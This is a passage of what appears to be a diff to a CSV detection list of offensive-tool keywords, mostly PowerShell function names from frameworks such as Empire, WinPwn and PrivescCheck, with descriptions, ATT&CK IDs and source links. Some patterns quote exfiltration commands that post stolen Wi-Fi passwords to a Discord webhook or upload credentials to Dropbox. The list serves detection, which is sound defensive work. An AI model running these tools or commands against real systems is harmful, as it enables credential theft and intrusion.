Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-PSInject.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*Invoke-PsUACme*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*Invoke-PsUACme*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PsUACme*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-Pwds.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*Invoke-RBDC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RBDC-over-DAVRPC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RDPwrap.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Invoke-ReflectivePEInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Invoke-ReflectivePEInjection.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*Invoke-RefreshToMSGraphToken -domain -ClientId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*Invoke-Reg1c1de*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Invoke-RestMethod -Uri 
https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Invoke-ReverseSocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z"
+"*invokereverttoself*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
+"*Invoke-RevertToSelf*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
+"*Invoke-RevShellServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-Rubeus*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into 
Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Rubeus*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RunAs.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"*invoke-runaspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral 
movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-RunningProcessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-S3ssionGoph3r*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-S4U-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*Invoke-SafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - 
T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SamBackupFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-SauronEye*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SccmCacheFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ScheduledTasksCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ScheduledTasksImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for 
Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ScheduledTasksUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-SCMPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*Invoke-SCShell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SDCLTBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
